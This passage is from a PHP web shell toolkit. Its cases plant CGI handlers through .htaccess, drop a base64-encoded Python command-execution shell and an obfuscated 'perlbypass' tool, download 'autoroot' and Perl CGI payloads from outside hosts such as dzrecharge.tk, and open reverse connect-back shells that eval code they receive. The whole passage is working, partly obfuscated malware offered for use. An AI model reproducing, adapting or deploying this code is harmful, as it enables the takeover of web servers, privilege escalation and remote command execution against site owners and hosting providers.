  5147. echo "<iframe src=cgitelnet1/izo.cin width=100% height=100% frameborder=0></iframe> ";
  5148.  
  5149. break;
  5150.  
  5151. case "PHP_7":
  5152.  
  5153.  
  5154.  
  5155. mkdir('python', 0755);
  5156.  
  5157. chdir('python');
  5158.  
  5159. $kokdosya = ".htaccess";
  5160.  
  5161. $dosya_adi = "$kokdosya";
  5162.  
  5163. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  5164.  
  5165. $metin = "AddHandler cgi-script .izo";
  5166.  
  5167. fwrite ( $dosya , $metin ) ;
  5168.  
  5169. fclose ($dosya);
  5170.  
  5171. $pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
  5172.  
  5173. IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
  5174.  
  5175. b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
  5176.  
  5177. cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
  5178.  
  5179. ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
  5180.  
  5181. Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
  5182.  
  5183. Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
  5184.  
  5185. YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
  5186.  
  5187. ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  5188.  
  5189. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
  5190.  
  5191. OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
  5192.  
  5193. dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
  5194.  
  5195. dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
  5196.  
  5197. b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  5198.  
  5199. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
  5200.  
  5201. aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
  5202.  
  5203. c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
  5204.  
  5205. NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
  5206.  
  5207. PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
  5208.  
  5209. VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  5210.  
  5211. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
  5212.  
  5213. cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
  5214.  
  5215. IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
  5216.  
  5217. aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
  5218.  
  5219. dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
  5220.  
  5221. Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
  5222.  
  5223. d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
  5224.  
  5225. aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
  5226.  
  5227. ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
  5228.  
  5229. XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
  5230.  
  5231. W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
  5232.  
  5233. cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
  5234.  
  5235. PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
  5236.  
  5237. IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
  5238.  
  5239. ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
  5240.  
  5241. aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
  5242.  
  5243. CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
  5244.  
  5245. ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
  5246.  
  5247. cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
  5248.  
  5249. ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
  5250.  
  5251. Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
  5252.  
  5253. IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
  5254.  
  5255. dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
  5256.  
  5257. ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
  5258.  
  5259. IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  5260.  
  5261. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
  5262.  
  5263. cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
  5264.  
  5265. IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
  5266.  
  5267. ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
  5268.  
  5269. YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
  5270.  
  5271. KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
  5272.  
  5273. aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
  5274.  
  5275. PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
  5276.  
  5277. PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
  5278.  
  5279. ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
  5280.  
  5281. ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
  5282.  
  5283. dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
  5284.  
  5285. aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
  5286.  
  5287. biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
  5288.  
  5289. bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
  5290.  
  5291. TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
  5292.  
  5293. bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
  5294.  
  5295. ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
  5296.  
  5297. SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
  5298.  
  5299. ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
  5300.  
  5301. cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
  5302.  
  5303.  
  5304.  
  5305. $file = fopen("python.izo" ,"w+");
  5306.  
  5307. $write = fwrite ($file ,base64_decode($pythonp));
  5308.  
  5309. fclose($file);
  5310.  
  5311. chmod("python.izo",0755);
  5312.  
  5313. echo "<iframe src=python/python.izo width=100% height=100% frameborder=0></iframe> ";
  5314.  
  5315. break;
  5316.  
  5317. case "PHP_9":
  5318.  
  5319. mkdir('perltools', 0755);
  5320.  
  5321. chdir('perltools');
  5322.  
  5323. $perltoolss = 'PD9waHAKLyoKCiovCmVjaG8gIjxodG1sPjx0aXRsZT5JbXBvcnRlciBUMDBseiB2LjQ8L3RpdGxl
  5324.  
  5325. PjxoZWFkPjxMSU5LIFJFTD0nU0hPUlRDVVQgSUNPTidIUkVGPSdodHRwOi8vd3d3LmhhY2stYm9v
  5326.  
  5327. ay5uZXQvZmF2aWNvbi5pY28nPjwvaGVhZD4KPHN0eWxlPmE6bGluayB7dGV4dC1kZWNvcmF0aW9u
  5328.  
  5329. Om5vbmU7fWE6aG92ZXIgeyAgICAgYm9yZGVyLWJvdHRvbTogMXB4IGRvdHRlZCAjYmEwMDAwO31h
  5330.  
  5331. OnZpc2l0ZWQge3RleHQtZGVjb3JhdGlvbjpub25lO308L3N0eWxlPgo8Ym9keSB0ZXh0PScjRkYw
  5332.  
  5333. MDAwJyBiZ2NvbG9yPScjMDAwMDAwJyBsaW5rPScjQ0NDQ0NDJyB2bGluaz0nIzgwODA4MCcgYWxp
  5334.  
  5335. bms9JyM5OTk5OTknPjxkaXYgYWxpZ249J2NlbnRlcic+PGJyPgo8aW1nIGJvcmRlcj0nMCcgc3Jj
  5336.  
  5337. PSdodHRwOi8vdXBsb2FkLnRyYWlkbnQubmV0L3VwZmlsZXMvbzhJOTk4MTAucG5nJyB3aWR0aD0n
  5338.  
  5339. NTY2JyBoZWlnaHQ9JzI4Myc+PC9kaXY+Cjxmb250IGZhY2U9J3RhaG9tYScgc2l6ZT0nMicgY29s
  5340.  
  5341. b3I9JyNmMzAwMDAnPjxicj48Yj48IS0tIGhhY2stYm9vay5uZXQgLS0+IjsKQHNldF90aW1lX2xp
  5342.  
  5343. bWl0KDApOwpAZXJyb3JfcmVwb3J0aW5nKEVfQUxMIHwgRV9OT1RJQ0UpOwokeD1hcnJheSggImh0
  5344.  
  5345. LnR4dCI9PiIuaHRhY2Nlc3MiLCAiY2dpLW5ldy50eHQiPT4iY2dpLnIxeiIsICJkby1uZXcudHh0
  5346.  
  5347. Ij0+ImRvbWFpbi5yMXoiLCAidXNlci50eHQiPT4idXNlci5yMXoiLCAiY28udHh0Ij0+ImNvbmZp
  5348.  
  5349. Zy5yMXoiLCAic3ltLnR4dCI9PiJzeW1saW5rLnIxeiIsICJzcWwtbmV3LnR4dCI9PiJzcWwucGhw
  5350.  
  5351. IiwgInI1Ny50eHQiPT4icjU3LnBocCIsICJjcGFuZWwudHh0Ij0+ImNwYW5lbC5waHAiLCAiZG9t
  5352.  
  5353. YWlucy10eHQudHh0Ij0+ImRvbWFpbi5waHAiLCAiam9vbWxhLnR4dCI9PiJqb29tbGEucGhwIiwg
  5354.  
  5355. IndwLnR4dCI9PiJ3cC5waHAiLCAiY29uZmlnLXBocC50eHQiPT4iY29uZmlnLnBocCIsICJpbmku
  5356.  
  5357. dHh0Ij0+ImluaS5waHAiLCAidmIudHh0Ij0+InZiLnBocCIsICJpc3N3LnR4dCI9PiJpc3N3LnBo
  5358.  
  5359. cCIsICJwbnB4LWluaS50eHQiPT4icGhwLmluaSIsICk7CmZvcmVhY2goJHggYXMgJGQ9PiR6KXsg
  5360.  
  5361. JGZpbGUgPSBmb3BlbigkeiAsIncrIik7CiRyMHg9ZmlsZV9nZXRfY29udGVudHMoJ2h0dHA6Ly93
  5362.  
  5363. d3cubXVzaWM0ZnVuLm9yZy9yMHgzZC9yMHgvJy4kZCk7CiR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUg
  5364.  
  5365. LCRyMHgpOwpmY2xvc2UoJGZpbGUpOwppZigkd3JpdGUpeyBlY2hvICJbK10gV3JpdGVkIDogPGEg
  5366.  
  5367. aHJlZj0nLi8keic+JHo8L2E+IDwvYnI+IjsKfWVsc2V7IGVjaG8gIlt+XSBDYW4ndCBXcml0ZSA6
  5368.  
  5369. ICR6IDxicj4iOwp9CmNobW9kKCR6ICwgMDc1NSk7Cn0KZWNobyAiPC9iPjwvZm9udD48Yj48Yj48
  5370.  
  5371. Zm9udCBmYWNlPSdUYWhvbWEnIHNpemU9JzInIGNvbG9yPScjQ0NDQ0NDJz48L2ZvbnQ+PC9iPjxm
  5372.  
  5373. b250IGZhY2U9J1RhaG9tYScgc2l6ZT0nMicgY29sb3I9JyM5OTk5OTknPjxiPjwvYj48IS0tIC9o
  5374.  
  5375. YWNrLWJvb2submV0IC0tPjxicj48L2ZvbnQ+PC9iPjxwIGFsaWduPSdjZW50ZXInPjxmb250IGZh
  5376.  
  5377. Y2U9J1RhaG9tYScgc3R5bGU9J2ZvbnQtc2l6ZTogOXB0Jz48Zm9udCBjb2xvcj0nI0ZGRkZGRic+
  5378.  
  5379. Q29kZWQgQnk8L2ZvbnQ+PGZvbnQgY29sb3I9JyNGRjAwMDAnPiBJcmFRaWFOLXIweCA8L2ZvbnQ+
  5380.  
  5381. PGZvbnQgY29sb3I9JyNGRkZGRkYnPiB8PC9mb250Pjxmb250IGNvbG9yPScjRkYwMDAwJz4gPGEg
  5382.  
  5383. aHJlZj0naHR0cDovL3d3dy5oYWNrLWJvb2submV0L3ZiLyc+d3d3LkhhY2stQm9vay5uZXQ8L2E+
  5384.  
  5385. PC9mb250PjwvZm9udD48L3A+PHAgYWxpZ249J2NlbnRlcic+PGZvbnQgZmFjZT0nVGFob21hJyBz
  5386.  
  5387. dHlsZT0nZm9udC1zaXplOiA5cHQnPkdyRUV0eiBUbzwvZm9udD48Zm9udCBmYWNlPSdUYWhvbWEn
  5388.  
  5389. IGNvbG9yPScjRkZGRkZGJyBzdHlsZT0nZm9udC1zaXplOiA5cHQnPiBbI11+PC9mb250Pjxmb250
  5390.  
  5391. IGZhY2U9J1RhaG9tYScgY29sb3I9JyNDQ0NDQ0MnIHN0eWxlPSdmb250LXNpemU6IDlwdCc+IEth
  5392.  
  5393. cmFyIGFsU2hhTWk8L2ZvbnQ+PGZvbnQgZmFjZT0nVGFob21hJyBjb2xvcj0nI0ZGRkZGRicgc3R5
  5394.  
  5395. bGU9J2ZvbnQtc2l6ZTogOXB0Jz58IEFuZCBBbGwgTXkgRnJpZW5kczwvcD48L2ZvbnQ+PGI+PGZv
  5396.  
  5397. bnQgZmFjZT0nVGFob21hJyBzaXplPScyJyBjb2xvcj0nI0ZGRkZGRic+PC9odG1sPiI7CiMgZGVj
  5398.  
  5399. cnlwdGVkOgojIGV2YWwoZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJ0RaUkh6cVJvQWdYM2M0cmFk
  5400.  
  5401. WlZZNE9GRHJaNFJKdkdRMkFSeU04Sjc3emw5L3lkNFV1aEYvT2RYZnNUZDcvS3BoNktMdC94M0Vx
  5402.  
  5403. ODVSZncveTlNeHkzLy9KV1EyS3V5MnhMNEV4NW96cFVNeDBsRGZ0UmM0ZlE0ZTI1R2kxQ0FCaE1F
  5404.  
  5405. d0Juc3dwQnNNQW9rU1RIOUtrL3JRMEcxcW02b0xjTjFvUlgzb2NvZy85ZjJHNjh0NDJ0SHJzYW4x
  5406.  
  5407. M1l0ZkJtenhDY1Jld05ablNDZ3FFK0o1RVB2bVVONktwbnJKREphdUNqTG05SThVSnE4NXVNcDdI
  5408.  
  5409. Q2NuVk10emlGK2dKWWU2K05xdGdxbTg3azdWUHFmdmJkczZPWGoyV0F1dTdsMFJRdXZIRmk0bmF6
  5410.  
  5411. cm1UZFZ2WFlLY2xQTjZnMkdkS292R2JYUmk3RW5sN295TjYzU1Myd0lkc3NydkgzRVEwK0tVUFk4
  5412.  
  5413. d0QycHBVMGVnMVBEcU83ay81bXdiTkU2emVUTHRDV0ZYSW12cWs0dXFFZVpaT3BkUlMwU3BFRnFq
  5414.  
  5415. TU04R2dTNkxQQXlMZ2VSYk9JTzA5c1lZdG16NjNKdk1sUWFmTFlPOTRBbVB2ZUhNVmg4OW1tRml6
  5416.  
  5417. L21xem5MUWRXSGZRU2gya1loUVN4SkhwZ21oU2NZcWlFV1VtYXFDMWhWcWRCS2djYnBoOWRZN2lj
  5418.  
  5419. NXdaTldiNy9KRkd3SnNnbC9rK081ZitlZEU3ZWtWZElGY0YvMytmSHhTdWJ3TlJiOXE1ZXlMUkNx
  5420.  
  5421. Q0ZLR29yb0RTVTFYTkZkS0xUVVhhMmUxRlRnTlBnSmYrSUZCN3l4NitaNFZGVGRCM2Z5b3hLT21t
  5422.  
  5423. cStSUnZ4TDVTSGdoNUJ5anN4Mjhrck92dHpXVjd3NEhxQ2lEUENGemZ6WnN5WHp2dFJxNmc0aUcz
  5424.  
  5425. NmZpYU1GVUN0eVk0bzdwdXRzaHRDSkdid3gyblE1MzlUSGpaQlFWdWtrRy95SFYzV0h2c21CUHlL
  5426.  
  5427. eHFVeEdyU1BFVjk1ajhwYWs4ZnJZeGFpSUtXako4d0pwM0Z1ZWZWZ2liTnhzK1drMWN0cXoyK3ZQ
  5428.  
  5429. VjhtZE5tdEpvSFRGWXByVVE3dE9Fd1pzcVB6WFJta2VXU3VtcFJZTmZmUjQrNVRDWjFXUFlFUmZi
  5430.  
  5431. VDAvbWRVaW9ibStPMlBHKzZDckoyNlZpeUJvRlM2dEFJZ2g1Sm1QM1BWYXdZSzVxUUc3VUJ5b2NX
  5432.  
  5433. OHBOMTEvaW91blpjZWp0VkFHaEduUE51QVdLOWM1SmRIbmRtZ01CUjhpbjNUR2JxeTN6L1lrMFNs
  5434.  
  5435. Zy9Jc2hHc0lsYjFNaVB1UmJCVWdRZnkrY3dyQ09HcUU0dHdKMkxXbTQ3cFJDTnljckl3Y0thczdC
  5436.  
  5437. Q3Q3K2diRFozcXYvNDdNQTVyTmpKbExDRDJ6SzhCTUhObURROTRDMldpZ1hna0VTZnIzOWNnVyty
  5438.  
  5439. Wlh5SmtweElKaU5NNTNGdTlBNG5vUWpUS0tUK1hHcUtaYXIyS0l2WVNOdkdZcjZYVVdvL3R4NFlS
  5440.  
  5441. UWFKQ0RQNThKRHFkN1RCUFlwME9OZll4YnQ5Tit1ZGhyT2pIRk1BUXB4eFg3NWEvWVE0OG0waXZz
  5442.  
  5443. dVk0UlhJVm9xcnZ0QW45UGVuRWZlcVAzMU0xTlhzV2hkZ3dwRWtDd21QYW0vbDFyZ3BNc2ZEZDJr
  5444.  
  5445. a2dJU3pLTGQvNlFnak1yb2dEVjlhYkZ1TUhsU0wzOFdNTkFTeWlWREE3TzZOWnVLUXVQYzh5K0cx
  5446.  
  5447. OU8rSFdJKytCOUlvZTVHcUdyYmoyTFdHdkNZNG56ZUlKWVdjZUpVTkQ5WXQvL0VhcmZxckloOVg1
  5448.  
  5449. VC80RnZYOUt5RHNjanFhbXNOYWM4cWlvZzViaHdWMG5NaktIRzZqaUNvN21zSTlXNG1rVTUwaS9Y
  5450.  
  5451. VE5NMGEwVENjWjl4TTl2aWJ5bWFyMzdkSGRUMHZaOHJWR0lYU1Z0dkZLbytTZDNKTEhLYjQ1emd5
  5452.  
  5453. TUw4N0xHbm5IUDBjaXVmT2JQWElOeGliVnFvcEtZN2R2VVRCb3d2dGFWTnJUb2w3ZnBYTTA1a0Vn
  5454.  
  5455. MVRPZW1oTXN1TTNBUHJvSnAyNTBmYTJhbk5ua0Z4dG9kYUlRU3ptYVJZeGZXanptT01nVEovNWFl
  5456.  
  5457. VVVhczZLa2VZK1A0ckRCbVZUalhPcS9mMVpqcExGcFp6bTR5MUc3MHk0a0tXWG4wZU9DM3VWZVVn
  5458.  
  5459. OGY0YktRQUM1Z21pRnBHSVpaOE05ZmYvNzgrZnZYLy83N0x3PT0nKSkpOwoKPz4=';
  5460.  
  5461.  
  5462.  
  5463. $file = fopen("perlbypass.php" ,"w+");
  5464.  
  5465. $write = fwrite ($file ,base64_decode($perltoolss));
  5466.  
  5467. fclose($file);
  5468.  
  5469. echo "<iframe src=perltools/perlbypass.php width=100% height=100% frameborder=0></iframe> ";
  5470.  
  5471. break;
  5472.  
  5473. case "PHP_10":
  5474.  
  5475.  
  5476.  
  5477. mkdir('autoroot', 0755);
  5478.  
  5479. chdir('autoroot');
  5480.  
  5481. $file = fopen("autoroot.txt" ,"w+");
  5482.  
  5483.  
  5484.  
  5485. $sa=file_get_contents('http://dzrecharge.tk/pv8L/1.txt');
  5486.  
  5487.  
  5488.  
  5489. $write = fwrite ($file ,$sa);
  5490.  
  5491.  
  5492.  
  5493. fclose($file);
  5494.  
  5495.  
  5496.  
  5497. if ($write) {
  5498.  
  5499.  
  5500.  
  5501. echo "The File Was Created Successfuly.</br>";
  5502.  
  5503.  
  5504.  
  5505. }
  5506.  
  5507. else {echo'"error"';}
  5508.  
  5509.  
  5510.  
  5511. $chm = chmod("autoroot.txt" , 0755);
  5512.  
  5513.  
  5514.  
  5515. if ($chm == true){
  5516.  
  5517. echo "chmoded the file to 755";
  5518.  
  5519. }else{
  5520.  
  5521. echo "sorry file didn't chmoded";
  5522.  
  5523. }
  5524.  
  5525. break;
  5526.  
  5527. case "PHP_11":
  5528.  
  5529.  
  5530.  
  5531. mkdir('cgi', 0755);
  5532.  
  5533. chdir('cgi');
  5534.  
  5535. $file = fopen("jeentel" ,"w+");
  5536.  
  5537. $sa=file_get_contents('http://dzrecharge.tk/pv8L/jeentel');
  5538.  
  5539. $write = fwrite ($file ,$sa);
  5540.  
  5541. chmod("jeentel",0777);
  5542.  
  5543. $file = fopen("cgiPerl.dz" ,"w+");
  5544.  
  5545. $sa=file_get_contents('http://dzrecharge.tk/pv8L/dz.txt');
  5546.  
  5547. $write = fwrite ($file ,$sa);
  5548.  
  5549. chmod("cgiPerl.dz",0755);
  5550.  
  5551. $kokdosya = ".htaccess";
  5552.  
  5553. $dosya_adi = "$kokdosya";
  5554.  
  5555. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  5556.  
  5557. $metin = "AddType application/x-httpd-cgi .dz
  5558.  
  5559. AddHandler cgi-script .dz";
  5560.  
  5561. fwrite ( $dosya , $metin ) ;
  5562.  
  5563. fclose ($dosya);
  5564.  
  5565. echo "<iframe src=cgi/cgiPerl.dz width=100% height=100% frameborder=0></iframe> ";
  5566.  
  5567. break;
  5568.  
  5569. case "PHP_12":
  5570.  
  5571.  
  5572.  
  5573. {
  5574.  
  5575. $ipz =$_SERVER["REMOTE_ADDR"];
  5576.  
  5577. $portz ="22";
  5578.  
  5579. if ($ipz == "" && $portz == ""){echo "Please fill IP Adress & The listen Port";}
  5580.  
  5581. else
  5582.  
  5583. {
  5584.  
  5585. $ipaddr = $ipz;
  5586.  
  5587. $port = $portz;
  5588.  
  5589. if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}
  5590.  
  5591. if (is_callable('stream_socket_client'))
  5592.  
  5593. {
  5594.  
  5595. $msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");
  5596.  
  5597. if (!$msgsock){die();}
  5598.  
  5599. $msgsock_type = 'stream';
  5600.  
  5601. }
  5602.  
  5603. elseif (is_callable('fsockopen'))
  5604.  
  5605. {
  5606.  
  5607. $msgsock = fsockopen($ipaddr,$port);
  5608.  
  5609. if (!$msgsock) {die(); }
  5610.  
  5611. $msgsock_type = 'stream';
  5612.  
  5613. }
  5614.  
  5615. elseif (is_callable('socket_create'))
  5616.  
  5617. {
  5618.  
  5619. $msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  5620.  
  5621. $res = socket_connect($msgsock, $ipaddr, $port);
  5622.  
  5623. if (!$res) {die(); }
  5624.  
  5625. $msgsock_type = 'socket';
  5626.  
  5627. }
  5628.  
  5629. else {die();}
  5630.  
  5631. switch ($msgsock_type)
  5632.  
  5633. {
  5634.  
  5635. case 'stream': $len = fread($msgsock, 4); break;
  5636.  
  5637. case 'socket': $len = socket_read($msgsock, 4); break;
  5638.  
  5639. }
  5640.  
  5641. if (!$len) {die();}
  5642.  
  5643. $a = unpack("Nlen", $len);
  5644.  
  5645. $len = $a['len'];
  5646.  
  5647. $buffer = '';
  5648.  
  5649. while (strlen($buffer) < $len)
  5650.  
  5651. {
  5652.  
  5653. switch ($msgsock_type)
  5654.  
  5655. {
  5656.  
  5657. case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer));
  5658.  
  5659. break;
  5660.  
  5661. case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));
  5662.  
  5663. break;
  5664.  
  5665. }
  5666.  
  5667. }
  5668.  
  5669. eval($buffer);
  5670.  
  5671. echo "[*] Connection Terminated";
  5672.  
  5673. die();
  5674.  
  5675. }
  5676.  
  5677. }
  5678.  
  5679. break;
  5680.  
  5681. case "PHP_13":
  5682.  
  5683.  
  5684.  
  5685. {
  5686.  
  5687. $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin');
  5688.  
  5689. $descriptorspec = array(
  5690.  
  5691. 0 => array("pipe","r"),
  5692.  
  5693. 1 => array("pipe","w"),
  5694.  
  5695. 2 => array("file","/tmp/log.txt","a"));
  5696.  
  5697. $ipx =$_SERVER["REMOTE_ADDR"];
  5698.  
  5699. $portx ="22";
  5700.  
  5701. $proto=getprotobyname("tcp");
  5702.  
  5703. if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0)
  5704.  
  5705. { die("[-] Socket Create Faile");}
  5706.  
  5707. if(($ret=socket_connect($sock,$ipx,$portx))<0)
  5708.  
  5709. { die("[-] Connect Faile");}
  5710.  
  5711. else{
  5712.  
  5713. $message="----------------------PHP Connect-Back--------------------\n";
  5714.  
  5715. $message.="----------------------- SyRiAn Sh3ll --------------------\n";
  5716.  
  5717. socket_write($sock,$message,strlen($message));
  5718.  
  5719. $cwd=str_replace('\\','/',dirname(__FILE__));
  5720.  
  5721. while($cmd=socket_read($sock,65535,$proto))
  5722.  
  5723. {
  5724.  
